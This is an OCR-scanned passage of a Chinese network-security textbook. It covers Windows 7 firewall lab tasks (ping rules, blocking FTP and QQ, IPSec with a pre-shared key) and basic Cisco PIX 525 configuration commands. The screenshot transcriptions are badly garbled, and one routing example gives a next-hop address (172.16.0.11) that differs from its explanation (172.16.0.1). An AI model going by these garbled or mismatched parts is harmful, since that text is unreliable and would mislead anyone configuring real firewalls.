户 组 .计算 机 、 计 算 机 组 ,协议 ,ICMP 类 型 等 。 规 则 中 的 各 项 标准 可 以 添加 在 一 起 ,添加 的 
标准 越 多 ,具有 高 级 安全 性 的 Windows 防火 墙 匹配 传人 的 流量 就 越 精细 。 

2) 连接 安全 规则 

可 以 使 用 连接 安全 规则 来 配置 本 计算 机 与 其 他 计算 机 之 间 特 定 连接 的 IPSec 设置 。 具 有 
高 级 安全 性 的 Windows 防火 墙 使 用 该 规则 来 评估 网 络 通信 ,然后 根据 该 规则 中 所 建立 的 标准 
阻止 或 允许 消息 。 在 某 些 环境 下 ,具有 高 级 安全 性 的 Windows 防火 墙 将 阻止 通信 。 如 果 所 配 
置 的 设置 要 求 连接 安全 (双向 ), 而 两 台 计算 机 无 法 互相 进行 身份 验证 , 则 将 阻止 连接 。 


74 项 目 实施 


任务 : Windows 防火 墙 的 应 用 


1. 任务 目标 

(1) 了 解 防火 墙 的 作用 。 

(2) 熟悉 Windows 防火 墙 的 应 用 。 
(3) 掌握 安全 规则 的 建立 方法 。 
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2. 任务 内 容 

(1) 选择 网 络 位 置 。 

(2) 启用 Windows 防火 墙 。 

(3) 设置 Windows 防火 墙 允许 ping 命令 响应 。 

(4) 设置 Windows 防火 墙 禁 止 访问 FTP 站 点 。 

(5) 设置 Windows 防火 墙 禁 止 QQ 程序 访问 服务 器 。 

(6) 设置 Windows 防火 墙 进行 加 密 安全 通信 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 操作 系统 的 计算 机 2 台 ,其 中 一 台 安 装 有 FTP 服务 。 

(2) 能 正常 运行 的 局 域 网 。 

4. 任务 实施 步骤 

1) 选择 网 络 位 置 

为 了 增加 计算 机 在 网 络 中 的 安全 性 ,管理 员 应 该 为 计算 机 选择 适当 的 网 络 位 置 。 

步骤 1: 单 击 屏幕 右 下 角 的 网 络 连 接 图 标 狠 ,在 打开 的 列表 中 单 击 “ 网 络 和 共享 中 心 ” 
链接 ,打开 “网 络 和 共享 中 心 ”窗口 ,如 图 7-11 所 示 。 
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连接 到 或 重新 连接 到 无 线 、 有 线 、 授 号 或 VPN 网 络 连 接 . 


0 PsiaamnsgE 
访问 位 于 其 他 网 络 计算 机 上 的 文件 和 打印 机 ,或 更 改 共享 设置 . 


lnternet 迁 项 
Windows 防火 二 二 车 
京 应 组 诊断 并 修复 网 络 问题 ， 或 区 得 芍 条 持 欠 信息 . 





图 7-11 “网 络 和 共享 中 心 ”窗口 


步骤 2: 单 击 目前 的 网 络 位 置 (如 公用 网 络 ) ,打开 “设置 网 络 位置 " 对 话 框 , 单 击 相 应 的 
网 络 位 置 (如 工作 网 络 ) 即 可 ,如 图 7-12 所 示 。 

2) 启用 Windows 防火 墙 

步骤 1: 选择 “开始 ”>“ 控 制 面板 ”命令 ,打开 “控制 面板 ”窗口 , 单 击 其 中 的 “Windows 
防火 墙 ”链接 ,打开 “Windows 防火 墙 ?窗口 ,如 图 7-13 所 示 。 
232 


项 目 7 防火 墙 技术 





选择 “AP2” 网 络 的 位 置 
此 计算 机 已 连接 到 网 络 ,Windows 将 根据 网 阁 位 置 生动 应用 正确 的 网 阁 设 置 . 








如 果 您 不 识别 网 络 上 的 所 有 计算 机 (例如 ， 怎 在 了 啡 厅 或 机 场 ， 或 者 使 用 的 是 移 
动 谢 各 ) ， 则 这 是 公用 网 络 ,不 受信 任 . 


加 将 司 我 所 连接 到 的 所 有 网 络 视 为 公用 网 阁 ， 上 且 不 要 再 向 我 询问 . 
帮助 我 渤 泽 





7-12 “设置 网 络 位 置 " 对 话 框 





使 用 Windows 防火 墙 来 帮助 保护 您 的 计算 机 
Windows 防火 培 有 助 于 防止 黑客 或 于 生 软件 通过 Internet 或 网 络 访问 和 的 计算 机 
防火 培 如 何 本 助 保护 计算 机 ? 
什么 是 网 络 位 置 ? 
更 新 防火 培 设 置 


Windows 防火 寺 未 使 用 推荐 的 设置 来 保护 
计算 机 . 


淮 苦 的 设置 有 哪些 ? 











邮 家 许 或 工作 (专用 ) 网 络 (0) 

















置 万 公用 网 络 (P) 











7-13 “Windows 防火 墙 ?窗口 
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步骤 2: 单 击 左 窗 格 中 的 “打开 或 关闭 Windows 防火 墙 ”链接 ,出 现 “ 自 定义 设置 "界面 ， 
如 图 7-14 所 示 , 选 中 “家 庭 或 工作 (专用 ) 网 络 位 置 设置 "和 “公用 网 络 位 置 设置 "区 域 中 的 
“启用 Windows 防火 墙 " 单 选 按 钮 . 单 击 “ 确 定 ” 按 钮 。 





Wo om Ee -| a | 





[x) 日 关闭 Windows 防火 壤 ( 不 推荐) 








7-14 启用 Windows 防火 墙 


说 明 在 图 7-13 中 , 单 击 “ 使 用 推荐 设置 ”按钮 也 可 启用 Windows 防火 墙 。 

3) 设置 Windows 防火 墙 来 允许 ping 命令 响应 

在 默认 情况 下 , Windows 防火 墙 是 不 允许 ping 命令 响应 的 , 即 当 本 地 计算 机 开启 
Windows 防火 墙 时 ,在 网 络 中 的 其 他 计算 机 上 运行 ping 命令 ,向 本 地 计算 机 发 送 数据 包 ， 
本 地 计算 机 将 不 会 应 答 响应 ,其 他 计算 机 上 会 出 现 ping 命令 的 “请 求 超时 ”错误 。 如 果 要 让 
Windows 防火 墙 允许 ping 命令 响应 ,可 进行 如 下 设置 。 

步骤 1: 在 “Windows 防火 墙 " 窗 口中 , 单 击 “ 高 级 设置 "链接 ,打开 “高 级 安全 Windows 
防火 墙 ?对 话 框 ,选择 左 窗 格 中 的 “入 站 规则 ?选项 ,然后 右 击 , 在 弹出 的 快捷 菜单 中 选择 “新 
建 规则 ”命令 ,如 图 7-15 所 示 。 

步骤 2: 在 打开 的 “新 建 入 站 规则 向 导 ” 对 话 框 中 ,选中 “ 自 定义 ” 单 选 按 钮 ,如 图 7-16 
所 示 。 

步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 程 序 ” 界 面 ,如 图 7-17 所 示 , 选 中 “所 有 程序 ” 单 选 
按钮 。 

步骤 4: 单 击 * 下 一 步 ?按钮 ,出 现 * 协 议和 端口 ?界面 ,如 图 7-18 所 示 , 选 择 “ 协 议 类 型 ” 
为 ICMPv4。 
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文 作 (P。 担 fF(A) 可 看 V) 帮助 (H) 





名 中 | 证 园区 | 上 加 








e 对 等 机 发 现 (WSD-In) BranchCache - 对 等 机 发 现 
e 内 容 检索 (HTTP-In) BranchCache - 内 容 检索 (~ 
托 和 车 委 存 最 务 器 (HTTP-In) ”BranchCache - 托管 委 存 最 
passive (FTP Passive Traff.。 FTP 服务 器 
ecure (FTP SSL Traffic-In) -FTP 服务 器 
PTP 法 入 量 ) FTP 服务 器 
@iscs! EscP-In) iSCSI 服务 
SCSI 服务 (TCP-In) iscsI 服 务 
-HTTP 流 (TC.。 Media Center Extender 
@ Media Center Edender - qWave (TCP.. Media Center Extender 
B Media Center Extender - qWave (UD.. Media Center Extender 
OB Media Center Extender - RTSP (TCP-In) Media Center Extender 
一 














规则 类 型 
选择 要 创建 的 防火 增 规 刚 类 型 











7-15 “高 级 安全 Windows 防火 墙 " 对 话 框 


要 创建 的 规则 类 型 
目 程序 @) 

控制 
旧 端 Do) 


控制 TCP 或 DP 端口 连接 的 规则 。 


日 预定 义 @): 
[BranchCache - 对 等 机 发 现 (使 用 WSD) 
控制 Windows 体验 功能 连接 的 规则 。 


回 自 定义 C) 
自 定义 规则 




















7-16 “新 建 信 站 规则 向 导 ” 对 话 框 
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辐 所 有 程序 CD) 
规则 应 用 于 与 其 他 规则 属性 相 CB8 计 算 机 上 的 所 有 连接 。 


个 此 程序 路 径 cD: 
[ ET 


示例 : Ec \path\proeran. exe 
XProgr saFilesX\browser \br owser_ exe 


























图 7-17 “程序 ”界面 


所 有 端口 - 


示 岗 : 0、443、5000-5010 


所 有 庙 品 ~ 





示 栗 本 、443、5000-5010 


oon CD 




















7-18 “协议 和 端口 "界面 


步骤 5: 单 击 “ 自 定义 ”按钮 ,打开 “ 自 定义 ICMP 设置 ?对 话 框 , 如 图 7-19 所 示 , 选 中 “ 特 
定 ICMP 类 型 " 单 选 按钮 ,并 在 列表 框 中 选中 “ 回 显 请 求 " 复 选 框 , 单 击 “ 确 定 ” 按 钮 返回 “协议 
和 端口 ?界面 。 

步骤 6: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 作 用 域 * 界 面 ,如 图 7-20 所 示 ,保持 默认 设置 不 变 。 
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将 该 规则 应 用 于 下 列 Internet 控制 消息 协议 CCMP) 连 接 - 





























图 任何 墓地 址 9) 
四 下列 好 地址 加 ): 









































图 7-20 “作用 域 ”界面 


步骤 7: 单 击 “ 下 一 步 " 按 钮 ,出 现 “ 操 作 ” 界 面 ,如 图 7-21 所 示 , 选 中 “允许 连接 ” 单 选 
按钮 。 
步骤 8: 单 击 “下 一 步 ?按钮 ,出 现 * 配 置 文件 ”界面 ,如 图 7-22 所 示 , 选 中“ 域 “ 专 用 ”“ 公 
用 ” 复 选 框 。 
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捧 作 
指定 在 连接 与 规则 中 指定 的 条 件 相 匹配 9 要 执行 的 操作 * 


连接 符合 指定 条 件 时 应 该 进行 什么 操作 ? 


加 允许 连接 CN) 
这 也 括 使 用 Isee 保护 以 及 未 使 用 IPsec 保护 的 连接 。 
个 只 允许 安全 连接 (C) 
避 a 使 用 Isee 属性 中 的 设置 以 及 连接 安 
自 定义 @)... | 


日 阻止 连接 00 








图 7-21 “操作 ”界面 




















7-22 “配置 文件 "界面 


步骤 9: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 名 称 ” 界 面 ,如 图 7-23 所 示 , 在 “名 称 ” 文 本 框 输入 本 
规则 的 名 称 *Ping OK”, 单 击 “ 完 成 ”按钮 ,完成 本 入 站 规则 的 创建 。 

步骤 10: 在 其 他 计算 机 上 Ping 本 计算 机 ,测试 是 否 Ping 成 功 。 然 后 禁用 “Ping OK” 入 
站 规则 ,再 次 测试 是 否 Ping 成 功 。 

说 明 要 允许 ping 命令 响应 ,也 可 在 入 站 规则 中 启用 “文件 和 打印 机 共享 ( 回 显 请 求 - 
ICMPv4-In) ”规则 即 可 。 
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图 7-23 “名 称 ”界面 


4) 设置 Windows 防火 墙 来 禁止 访问 FTP 站 点 

具有 高 级 安全 性 的 Windows 防火 墙 默 认 不 阻止 出 去 的 流量 。 但 用 户 可 以 针对 数据 包 
的 协议 和 端口 创建 相应 的 出 站 规则 。 设 置 Windows 防火 墙 禁止 访问 FTP 站 点 的 步骤 
加 Fs 

步骤 1: 在 “高 级 安全 Windows 防火 墙 ? 对 话 框 中 ,选择 左 窗 格 中 的 “出 站 规则 ?选项 , 然 
后 右 击 ,在 弹出 的 快捷 菜单 中 选择 “新 建 规则 ”命令 ,如 图 7-24 所 示 。 




















7-24 新 建 出 站 规则 
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步骤 2: 在 打开 的 “新 建 出 站 规则 向 导 ” 对 话 框 中 ,选中 “端口 ” 单 选 按钮 ,如 图 7-25 
所 示 。 





器 程序 了 ) 


革 口 o) 
控制 TCF 或 WP 端口 连接 的 规则 。 


目 预定 义 吧 ): 
rsnchCache ~ 对 等 机 发 现 (使 用 YSD) 
控制 Windows 体验 功能 连接 的 规则 。 


日 自 定义 CC) 
自 定义 规则 * 














图 7-25 “新 建 出 站 规则 向 导 ” 对 话 框 


步骤 3: 单 击 * 下 一 步 ? 按 钮 ,出现 * 协 议和 端口 ?界面 ,选中 TCP 单 选 按 钮 ,设置 “特定 远 
程 端口 ?为 “21”, 如 图 7-26 所 示 。 

















7-26 “协议 和 端口 "界面 


步骤 4: 单 击 “ 下 一 步 ”按钮 ,出 现 “ 操 作 ” 界 面 ,选中 “阻止 连接 ” 单 选 按钮 ,如 图 7-27 
所 示 。 

步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 配 置 文件 ”界面 ,选中 “ 域 ”* 专 用 ”“ 公 用 ” 复 选 框 ,如 
图 7-28 所 示 。 
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图 7-27 “操作 ”界面 


























图 7-28 “配置 文件 "界面 


步骤 6: 单 击 “ 下 一 步 "按钮 ,出 现 “ 名 称 ” 界 面 ,在 "名称" 文本 框 中 输入 本 规则 的 名 称 
“No FTP-out”, 单 击 “ 完 成 ”按钮 ,完成 本 出 站 规则 的 创建 ,如 图 7-29 所 示 。 

步骤 7: 访问 FTP 站 点 ,测试 是 否 能 够 访问 成 功 。 

说 明 如 果 以 前 成 功 访问 过 FTP 站 点 , 需 删 除 访问 记录 后 重新 访问 。 

步骤 8: 禁用 No FTP-out 出 站 规则 ,重新 访问 FTP 站 点 ,测试 是 否 能 够 访问 成 功 。 
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图 7-29 “名 称 ” 界 面 


5) 设置 Windows 防火 墙 来 禁止 QQ 程序 访问 服务 器 

有 些 应 用 程序 ,比如 QQ 程序 ,可 以 使 用 多 种 协议 和 端口 连接 服务 器 。 要 想 禁 止 QQ 应 
用 程序 访问 服务 器 ,可 以 创建 基于 应 用 程序 的 出 站 规则 进行 阻止 ,操作 步骤 如 下 。 

步骤 1: 在 “高 级 安全 Windows 防火 墙 ? 对 话 框 中 , 右 击 * 出 站 规则 ?选项 ,在 弹出 的 快捷 
菜单 中 选择 “新 建 规则 "命令 ,在 打开 的 “新 建 出 站 规则 向 导 ” 对 话 框 中 选中 “程序 ” 单 选 按钮 ， 
如 图 7-30 所 示 。 


加 程序) 
控制 程序 连 摘 的 规 I。 
旧 半 Do) 
控制 Tc 或 mn 庙 口 连接 的 损 刚 。 
日 定义 四 : 
[本 nchceehs - 对 等 机 改观 (使 用 150) 








控制 indovs 体验 功能 连接 的 规 刚 * 
© 自 定义 CC) 
自 定义 规则 。 








7-30 “新 建 出 站 规则 向 导 ” 对 话 框 
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步骤 2: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 程 序 ” 界 面 ,选中 “此 程序 路 径 ” 单 选 按钮 ,然后 浏览 到 
本 机 中 的 QQ. exe 文件 ,如 图 7-31 所 示 。 





程序 
指定 此 规则 匹配 的 程序 的 完整 程序 路 径 和 可 执行 程序 名 称 * 


该 规则 应 用 于 所 有 程序 还 是 特定 程序 ? 


日 所 有 程序 CA) 
规则 应 用 于 与 其 他 规则 属性 相 [CE 计算 机 上 的 所 有 连接 。 


加 此 程序 路 径 7)- 
Kerogr oFilesX\Tencent\QQ\Bin\Qd exe 


示例 : ci\path\progr mm. exe 
XProgr waFilesX\br oser\brovser exe 




















图 7-31 “程序 ”界面 


步 又 3: 单 击 * 下 一 步 ? 按 钮 ,出现 “操作 ” 界 面 ,选中 * 阻 止 连接 ? 单 选 按钮 。 

步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 配 置 文件 "界面 ,选中 * 域 “专用 ”“ 公 用” 复 选 框 。 

步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 名 称 ” 界 面 ,在 “名 称 ” 文 本 框 输 入 本 规则 的 名 称 “NO 
QQ”, 单 击 “ 完 成 ”按钮 ,完成 本 出 站 规则 的 创建 。 

步骤 6: 登录 QQ, 会 发 现 QQ 登录 失败 。 

步骤 7: 禁用 NO QQ 出 站 规则 ,会 发 现 QQ 登录 成 功 。 

6) 设置 Windows 防火 墙 进 行 加 密 安全 通信 

如 果 要 求 两 台 计算 机 之 间 进 行 加 密 安全 通信 ,可 设置 连接 安全 规则 ,操作 步骤 如 下 。 

步骤 1: 在 PC1 计算 机 中 , 右 击 * 连 接 安全 规则 ?选项 ,在 弹出 的 快捷 菜单 中 选择 “新 建 
规则 ”命令 ,在 打开 的 “新 建 连接 安全 规则 向 导 ” 对 话 框 中 选中 “服务 器 到 服务 器 ” 单 选 按 钮 ， 
如 图 7-32 所 示 。 

步骤 2: 单 击 * 下 一 步 "按钮 ,出现 * 终 结 点 ”界面 ,添加 终结 点 1( 如 PC1 计算 机 ) 和 终结 
点 2( 如 PC2 计算 机 ) 的 IP 地址 ,如 图 7-33 所 示 。 

步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 要 求 ” 界 面 ,选中 “入 站 和 出 站 连接 要 求 身份 验证 ” 单 
选 按 钮 ,如 图 7-34 所 示 。 

步骤 4: 单 击 “ 下 一 步 ” 按 钮 出现“ 身份 验证 方法 ”界面 .选中 “高 级 ” 单 选 按钮 ,如 图 7-35 
所 示 。 
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在 计算 机 终结 点 ! 和 终结 点 2 之 间 创 建安 全 连接 。 
图 结 点 1 中 的 计算 机 

个 任何 了? 地 址 中) 

语 下 列 理 地 址 0 


192. 166 100 








Er 











自 定义 应 用 此 规 M3 接口 类型: 
终结 点 2 中 的 计算 机 

咎 任何 理 地址 Y) 

古 下 列 理 地 址 00: 

192. 168. 1. 104 




















图 7-33 “终结 点 "界面 


步骤 5: 单 击 “ 自 定义 ”按钮 ,打开 “ 自 定义 高 级 身份 验证 方法 "对话 框 , 单 击 左 侧 的 “ 添 
加 ”按钮 ,打开 “添加 第 一 身份 验证 方法 "对话 框 ,设置 “ 预 共享 密 钥 ”为 123456, 如 图 7-36 
所 示 。 

步骤 6: 单 击 “确定 ”按钮 ,返回 “ 自 定义 高 级 身份 验证 方法 "对话 框 ,再 单 击 “ 确 定 ” 按 钮 ， 
返回 “身份 验证 方法 "界面 。 

步骤 7: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 配 置 文件 ”界面 ,选中 “ 域 * 专 用 ”“ 公 用 ” 复 选 框 。 
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图 7-34 “要 求 "界面 


只 多 许 来 自 具有 此 证 书 售 发 机 构 5 人 证 书 的 计算 机 89 连接 进行 通信 。 


签名 算法 E) [Eee@ -| 


证 书 存 朵 类 型 m: [ 根 CA BA) -| 





cD: | ] Cammw 
口 只 接受 健康 证 书 0 
吾 证 书 由 网 络 ; 











7-35 “身份 验证 方法 ”界面 


步骤 8: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 名 称 ” 界 面 , 在 “名 称 ” 文 本 框 中 输入 本 连接 安全 规则 
的 名 称 *To PC2”, 单 击 “ 完 成 ”按钮 ,完成 本 连接 安全 规则 的 创建 。 
步骤 9: 在 PC2 计算 机 中 使 用 相同 的 方法 ,新 建 一 条 名 称 为 “To PC1” 的 连接 安全 规则 ， 
注意 预 共享 密 钥 要 一 致 。 
步骤 10: 在 PC1l 计算 机 中 ,启用 “Ping OK” 入 站 规则 ,在 PC2 中 执行 “ping 192. 168. 1. 
100 -t” 命 令 。 
245 


网 络 安全 技术 项 目 化 教程 第 2 版 ) 



































[| 
i 选择 用 于 第 一 身份 验证 的 赁 所 
|) © HM Gerderos wm 于 
© 计算 机 0mrUhe) 中 
日 来 自 下 列 正 书 售 发 机 构 CA 的 计算 机 证 书信 ); 
签名 算法 6): SA iA) 
证 8 存 久 类 型 中 [ 根 ch GO -] 
加 
括 定 第 一 
取消 
































图 7-36 “添加 第 一 身份 验证 方法 ”对 话 框 


步骤 11: 在 PC1 或 PC2 计算 机 中 ,展开 “监视 ”>“ 安 全 关联 ”一 “ 主 模式 ”选项 ,查看 窗 
口 右 侧 的 主 模式 内 容 , 如 图 7-37 所 示 , 可 见 PC1 和 PC2 计算 机 之 间 的 通信 是 加 密 的 。 











晶 192.168.1.100 192.168.1.104 惠 共 享 的 窗 钥 。 无 身份 验证 AES-CBC 128 





图 7-37 主 模式 内 容 


75 拓展 提升 : Cisco PX 防火墙 配 置 


任何 企业 安全 策略 的 一 个 主要 部 分 都 是 实现 和 维护 防火 墙 ,因此 防火 墙 在 网 络 安全 的 
实现 当中 扮演 着 重要 的 角色 。 防 火 墙 通常 位 于 企业 网 络 的 边缘 ,这 使 得 内 部 网 络 与 
Internet 或 者 与 其 他 外 部 网 络 之 间 互 相隔 离 , 并 限制 网 络 互 访 , 从 而 保护 企业 内 部 网 络 。 设 
置 防火 墙 的 目的 是 为 了 在 内 部 网 与 外 部 网 之 间 设 立 唯 一 的 通道 ,简化 网 络 的 安全 管理 。 

在 众多 的 企业 级 主流 防火 墙 中 ,Cisco PIX 防火 墙 是 所 有 同类 产品 性 能 最 好 的 一 种 。 
Cisco PIX 系列 防火 墙 主要 有 5 种 型 号 : PIX506、PIX 515、PIX 520、PIX 525 和 PIX 535。 
其 中 PIX535 是 PIX 500 系列 中 产品 最 新 、 功 能 最 强 的 一 款 , 它 可 以 提供 运营 商 级 别 的 处 理 
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能 力 ,适用 于 大 型 的 ISP 等 服务 提供 商 。 但 是 PIX 特有 的 OS 操作 系统 ,使 得 大 多 数 管理 是 
通过 命令 行 来 实现 的 ,不 像 其 他 同类 的 防火 墙 通过 Web 管理 界面 来 进行 网 络 管理 ,这 样 会 
给 初学 者 带 来 不 便 。 以 下 将 通过 实例 介绍 如 何 配置 Cisco PIX 防火 墙 。 

在 配置 PIX 防火 墙 之 前 , 先 来 介绍 一 下 防火 墙 的 物理 特性 。 防 火 墙 通常 至 少 具有 3 个 
接口 ,但 许多 早期 的 防火 墙 只 有 2 个 接口 ; 当 使 用 具有 3 个 接口 的 防火 墙 时 ,就 至 少 产生 了 
3 个 网 络 ,描述 如 下 。 

(1) 内 部 区 域 (内 网 )。 内 部 区 域 通 常 就 是 指 企业 内 部 网 络 或 者 是 企业 内 部 网 络 的 一 部 
分 。 它 是 互联 网 络 的 信任 区 域 , 即 受 到 了 防火 墙 的 保护 。 

(2) 外 部 区 域 ( 外 网 )。 外 部 区 域 通常 指 Internet 或 者 非 企业 内 部 网 络 。 它 是 互联 网 络 
中 不 被 信任 的 区 域 , 当 外 部 区 域 想 要 访问 内 部 区 域 的 主机 和 服务 ,通过 防火 墙 , 就 可 以 实现 
有 限制 的 访问 。 

(3) 非 军事 区 (DMZ)。DMZ 是 一 个 隔离 的 网 络 ,或 几 个 网 络 。 位 于 DMZ 中 的 主机 或 
服务 器 被 称 为 堡 又 主机。 一 般 在 DMZ 内 可 以 放置 Web 服务 器 ,E-mail 服务 器 等 。DMZ 
对 于 外 部 用 户 通常 是 可 以 访问 的 ,这 种 方式 让 外 部 用 户 可 以 访问 企业 的 公开 信息 ,但 却 不 允 
许 他 们 访问 企业 内 部 网 络 。 

说 明 2 个 接口 的 防火 墙 是 没有 DMZ2 的 。 

由 于 PIX535 在 企业 级 别 不 具有 普遍 性 ,因此 下 面 主 要 说 明 PIX525 在 企业 网 络 中 的 
应 用 。 

PIX 防火 墙 提供 4 种 管理 访问 模式 。 

(1) 非特 权 模 式 。PIX 防火 墙 开 机 自 检 后 ,就 处 于 这 种 模式 。 系 统 显 示 为 pixfirewall 一 。 

(2) 特权 模式 。 输 入 enable 命令 进入 特权 模式 ,可 以 改变 当前 配置 。 显 示 为 
pixfirewall# 。 

(3) 配置 模式 。 输 入 configure terminal 命令 进入 此 模式 , 绝 大 部 分 的 系统 配置 都 在 这 
里 进行 。 显 示 为 pixfirewall(config) # 。 

(4) 监视 模式 。PIX 防火 墙 在 开机 或 重启 过 程 中 , 按 住 Esc 键 进入 监视 模式 。 这 时 可 
以 更 新 操作 系统 映像 和 口令 恢复 。 显 示 为 monitor>。 

配置 PIX 防火 墙 有 6 个 基本 命令 : nameif interface ip address nat ,global route。 这 
些 命令 在 配置 PIX 时 是 必需 的 。 以 下 是 配置 的 基本 步骤 。 

1. 配置 防火 墙 接口 的 名 字 ,并 指定 安全 级 别 Cnameif) 

Pix525 二 enable 

Pix525 # config terminal 

Pix525(config) # nameif ethernet0 outside security0 

Pix525(config) # nameif ethernetl inside security100 

Pix525(config) # nameif dmz security50 

提示 : 在 默认 设置 中 ,ethernet0 被 命名 为 外 部 接口 (outside) ,安全 级 别 是 0;ethernetl 
被 命名 为 内 部 接口 (inside) ,安全 级 别 是 100。 安 全 级 别 取 值 范围 为 0 一 100, 数 字 越 大 则 人 安 
全 级 别 越 高 。 

2. 配置 以 太 接 口 参数 (interface) 

Pix525(config) # interface ethernet0 auto ;auto 表示 自 适 应 网 卡 类 型 
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Pix525(config) # interface ethernetl 100full ;100full 表示 100Mbps 全 双 工 

Pix525(config) # interface ethernet2 auto 

3. 配置 内 外 网 卡 的 IP 地 址 (ip address) 

Pix525(config) # ip address outside 61. 144. 51. 42 255. 255. 255. 248 

Pix525(config) # ip address inside 192. 168. 0. 1 255. 255. 255.0 

很 明显 ,Pix525 防火 墙 的 外 网 IP 地 址 是 61. 144. 51. 42, 内 网 IP 地 址 是 192. 168. 0. 1。 

4. 指定 要 进行 转换 的 内 部 地 址 (nat) 

nat 的 作用 是 将 内 网 的 私有 IP 地 址 转换 为 外 网 的 公有 IP 地 址 。nat 命令 总 是 与 global 
命令 一 起 使 用 ,这 是 因为 nat 命令 可 以 指定 一 台 主 机 或 一 段 范围 的 主机 访问 外 网 ,访问 外 网 
时 需要 利用 global 所 指定 的 地 址 池 进 行 对 外 访问 。 

nat 命令 配置 语法 如 下 : 


nat (if _ name) nat id local ip [netmark] 


其 中 “(if_name) ”表示 内 网 接口 的 名 字 , 例 如 inside; nat_id 用 来 标识 全 局 地 址 池 ,使 它 
与 其 相应 的 global 命令 相 匹 配 ;local_ip 表示 内 网 被 分 配 的 IP 地 址 ,例如 0.0.0.0 表示 内 网 
所 有 主机 可 以 对 外 访问 ;Lnetmarkj 表 示 内 网 IP 地 址 的 子 网 掩 码 。 

例 1: Pix525(config)#nat (inside) 1 00 

表示 启用 nat, 内 网 的 所 有 主机 都 可 以 访问 外 网 ,用 0 可 以 代表 0.0. 0.0。 

例 2: Pix525(config) # nat (inside) 1 192. 168. 1.0 255. 255. 255. 0 

表示 只 有 192. 168. 1.0 这 个 网 段 内 的 主机 可 以 访问 外 网 。 

5. 指定 外 部 地 址 的 范围 (global) 

global 命令 把 内 网 的 IP 地 址 翻译 成 外 网 的 IP 地 址 或 一 段 地 址 范围 。global 命令 的 配 
置 语法 如 下 : 


global (if name) nat id ip address-ip address [netmark global mask] 


其 中 “(if_name) "表示 外 网 接口 的 名 字 , 例 如 “(outside)”;nat_id 用 来 标识 全 局 地 址 池 ， 
使 它 与 其 相应 的 nat 命令 相 匹 配 ;ip_address-ip_address 表示 翻译 后 的 单个 IP 地 址 或 一 段 
IP 地 址 范围 ;Lnetmark global_mask] 表 示 全 局 IP 地 址 的 子 网 掩 码 。 

例 3: Pix525(config)#global (outside) 1 61. 144. 51. 42-61. 144. 51. 48 

表示 内 网 的 主机 通过 Pix 防火 墙 要 访问 外 网 时 ,Pix 防火 墙 将 使 用 61. 144. 51. 42 一 
61. 144. 51. 48 这 段 IP 地 址 池 为 要 访问 外 网 的 主机 分 配 一 个 全 局 IP 地 址 。 

例 4: Pix525(config)#global (outside) 1 61. 144. 51. 42 

表示 内 网 要 访问 外 网 时 ,Pix 防火 墙 将 为 访问 外 网 的 所 有 主机 统一 使 用 61. 144. 51. 42 
这 个 单一 I 了 PP 地址。 

例 5: Pix525(config)#no global (outside) 1 61. 144. 51. 42 

表示 删除 这 个 全 局 表 项 。 

6. 设置 静态 路 由 (route) 

route 命令 定义 一 条 静态 路 由 。 

route 命令 配置 语法 如 下 : 
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route if name ip address netmask gateway ip [metric] 


其 中 if_name 表示 接口 名 字 . 例 如 inside、outside;ip_address 和 netmask 为 目标 IP 地 
址 及 其 子 网 掩 码 ;gateway_ip 表示 网 关 路 由 器 的 IP 地 址 ;[metric] 表 示 到 gateway_ip 的 跳 
数 , 通 常 默认 值 是 1 。 

例 6: Pix525(config) # route outside 0 0 61. 144. 51. 168 1 

表示 一 条 指向 边界 路 由 器 (IP 地 址 为 61. 144. 51. 168) 的 默认 路 由 。 

例 7: Pix525(config) # route inside 10. 1.1.0 255.255. 255.0 172. 16.0.11 

Pix525(config) # route inside 10. 2.0.0 255.255.0.0 172. 16.0.11 

如 果 内 部 网 络 只 有 一 个 网 段 ,按照 例 6 那样 设置 一 条 默认 路 由 即 可 ;如 果 内 部 存在 多 个 
网 络 ,需要 配置 多 条 静态 路 由 。 例 7 中 的 上 面 那 条 命令 表示 创建 了 一 条 到 网 络 10. 1.1.0 的 
静态 路 由 ,静态 路 由 的 下 一 跳 路 由 器 IP 地 址 是 172. 16. 0. 1; 例 7 中 下 面 那 条 命令 表示 创建 
一 条 到 网 络 10. 2.0.0 的 静态 路 由 ,静态 路 由 的 下 一 跳 路 由 器 的 IP 地址 也 是 172. 16. 0. 1。 

7. 配置 静态 IP 地 址 并 进行 翻译 (static) 

如 果 从 外 网 发 起 一 个 会 话 , 会 话 的 目的 地 址 是 一 个 内 网 的 IP 地 址 ,static 命令 就 把 内 网 
地 址 翻译 成 一 个 指定 的 外 网 地 址 ,允许 这 个 会 话 建立 。static 命令 配置 语法 如 下 : 


static (internal if name,external if name) outside ip address inside ip address 


其 中 internal_if_name 表示 内 网 接口 名 ,安全 级 别 较 高 ,如 inside;external_if_name 为 
外 网 接口 名 ,安全 级 别 较 低 , 如 outside;outside_ip_address 为 正在 访问 的 较 低 安 全 级 别 的 
接口 上 的 IP 地 址 ;inside_ip_address 为 内 部 网 络 的 本 地 IP 地 址 。 

例 8: Pix525(config) # static (inside, outside) 61. 144. 51. 62 192.168.0.8 

表示 内 网 IP 地 址 为 192. 168. 0. 8 的 主机 ,对 于 通过 Pix 防火 墙 建立 的 每 个 会 话 , 都 
被 翻译 成 61. 144. 51. 62 这 个 外 网 地 址 ,也 可 以 理解 成 static 命令 创建 了 内 网 IP 地 址 
192. 168.0.8 和 外 网 IP 地 址 61. 144. 51. 62 之 间 的 静态 映射 。 

例 9: Pix525(config) # static (inside, outside) 192. 168. 0. 2 10. 0. 1.3 

例 10: Pix525(config) # static (dmz, outside) 211. 48. 16. 2 172. 16. 10. 8 

通过 以 上 几 个 例子 ,说 明 使 用 static 命令 可 以 为 一 个 特定 的 内 网 IP 地 址 设置 一 个 永久 
的 外 网 IP 地 址 。 这 样 就 能 够 为 具有 较 低 安全 级 别 的 指定 接口 创建 一 个 入 口 ,使 它们 可 以 进 
入 具有 和 较 高 安全 级 别 的 指定 接口 。 

